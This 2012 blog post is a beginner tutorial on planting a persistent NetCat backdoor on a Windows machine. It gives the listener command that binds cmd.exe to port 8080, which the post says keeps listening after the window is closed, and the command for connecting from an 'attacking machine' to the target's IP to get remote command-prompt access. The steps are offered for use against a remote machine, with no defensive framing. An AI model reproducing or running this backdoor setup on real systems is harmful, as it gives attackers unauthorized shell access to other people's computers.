Wednesday, May 30, 2012

Creating a backdoor, and connecting to it, with NetCat

Most of you are probably asking what is NetCat? To make it simple, NetCat/NC makes and accepts Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections. Literally that's it lol

This is for the newbees who dont know what NC is and want to know how to backdoor using this software.

How to make a persistent backdoor with NetCat

This is the overview of what we are going to be doing. The fist thing we want to do is put nc.exe, which is the executable file, in system32. Then After that we are going to head to CMD and make a persistent listener.

1. Downlaod NC

2. Place NC.exe in system32

3. Go to CMD and type this Command Line.

nc -v -L -p 8080 -e cmd.exe

Let me explain the code, -v is verbose, -L is to make it Listen which is different from -l because if you would have put -l parameters instead of -L parameters, once you close the CMD window, the NC session will be closed as well. -p is the port you want to listen to. -e is the executable program you want to launch once the connection is established, in our case, command prompt.

Now you can close the window and still have NC listening on port 8080. Now that you have backdoored the remote machine with it, its time to connect to it.

On the attacking machine, go to CMD and type this command line:

nc -v [IpOfTargetMachine] 8080

Once you hit enter, you will have CMD access to the remote computer!

Thats about it. If you have any questions about any of this, feel free to ask.

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